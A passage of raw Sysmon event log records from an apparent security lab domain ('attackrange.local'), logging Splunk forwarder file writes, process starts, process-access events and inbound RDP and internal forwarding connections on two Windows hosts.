Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=018362EC3CB63CD8C9884CDBA0BE3D74,SHA256=DC2810BF8278B380D06166C376B561C04FA16418127FAB9F0C271E163064F8B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050170Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:46.379{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93E9AD29E1A3907EFFF55F4AF92051AF,SHA256=9EDBA7CCAD1D88CD059D0CFFA2A343D9F09EDA0D4AD107FFEC273921A64CC97F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050169Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:43.243{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62500-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001050168Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:43.241{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63913-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001050167Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:46.033{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8AD2-6151-347A-00000000FC01}6412C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050166Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:46.033{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050165Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:46.033{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050164Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:46.033{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050163Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:46.033{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050162Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:46.033{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8AD2-6151-347A-00000000FC01}6412C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050161Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:46.033{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8AD2-6151-347A-00000000FC01}6412C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050160Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:46.018{5EBD8912-8AD2-6151-347A-00000000FC01}6412C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050175Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:47.550{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38CC908C0C7816F49FC424ACF493C7B1,SHA256=E453C2C91A97273E46594D69DF79B41C5803E55BCB9C71DB8A2C1FE1F6A665EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978834Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:43.837{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59384-false10.0.1.12-8000- 23542300x8000000000000000978833Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:47.007{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2F244F5557013E3D30C7BD0F635CAA0,SHA256=CD78215C9EADF6201BCC15672AC1714A580C9423D3AEAABF6F6D2E41059F1C11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050174Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:47.531{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B693784CC68F01A36B280AB8D812C429,SHA256=0D255BDD6768D2B18C2F37708EBAF7BD75212044DC706909C0B437CC3ECADD11,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050173Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:45.569{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com46471-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001050172Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:44.925{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53366-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050176Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:48.596{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=129B108C1FB05951AF4FFE3E4DA38C64,SHA256=A22C132BAC322CAA537A6704D4D0E82E645C3B51EFBF06ACFB934F276C038C84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978835Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:48.226{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=449BB1EC26C1AA302930822BEDF4BF7F,SHA256=92D346FE7429E1DEFA77AE9DDFA884BB67208D239AB2BC65E242C2CB5428000A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978836Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:49.460{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A9AECF52CA9DA20EC2C0537E07D08D7,SHA256=A6DD1D470E9AA907BE7D7B7091E66FF2BB877B867D6BF13B8FD70BC6E709BB39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050177Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:49.604{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=342F90399C903D536B9448CF696EE9FA,SHA256=9F4726C5FD45A026D20069CA82FF06E5C3EA246BE08C92BB7DF7B0CC9A01F066,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978837Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:50.632{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D79A49E64E1953FB47F7A28E58C00806,SHA256=7DB5B1067A5F2F0AF253CFB20A34EDCA8B0DEB0BAB0B72ACF7CB32521311A59C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050178Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:50.619{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7D463DD5F1DF577B76CA377E4557E63,SHA256=777FF3DCA831DAF454E21C124B94B0D94CCFC5D399034D39567A7029ECE8830C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978840Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:51.663{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B492AF7665DAAC0EF4C070A563600A95,SHA256=A5AE99BF145F312106F0B78040925E08AB3A120BAAA8E8C8614343AFBBF45D97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050179Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:51.634{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12EFD86636BF2C2DD5DD74DDC2642EB1,SHA256=90D19BC90A094E1A49CA1D69902155EEC47E6A509FE3B767CDCE46C17EC503E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978839Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:51.648{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1AA477B895E95D6D9C7440D2FAB58297,SHA256=B3910CA4A6A298C17BF17DD8DD0932569839D4B37FBEB9B95CE73762A5581A1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978838Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:51.648{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BAD19212D2D3CE524C9A76DB77A10825,SHA256=392BAE637D6E715415846B8AAC784EDC54003A3A0FAFD3A68B2A9A0DFF602006,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978842Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:52.898{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB3128FFF8B396495F39194F998BA2C8,SHA256=1D9A245A6086007B4A138F1EA02D6289DB7DD3F492C15DFC70E024B86D61F94B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050181Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:52.701{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0081BF0C470AC76EA177F365D853D2B4,SHA256=10F570CC45DDDA2E7BD6C87D6D0C034F3D9C588CCFFD6BDF6E0EFDC0E492F68F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978841Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:48.606{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-61823-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001050180Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:50.826{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53367-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001050190Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:53.980{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8AD9-6151-357A-00000000FC01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050189Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:53.980{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050188Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:53.980{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050187Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:53.980{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050186Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:53.980{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050185Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:53.980{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8AD9-6151-357A-00000000FC01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050184Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:53.980{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8AD9-6151-357A-00000000FC01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050183Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:53.966{5EBD8912-8AD9-6151-357A-00000000FC01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 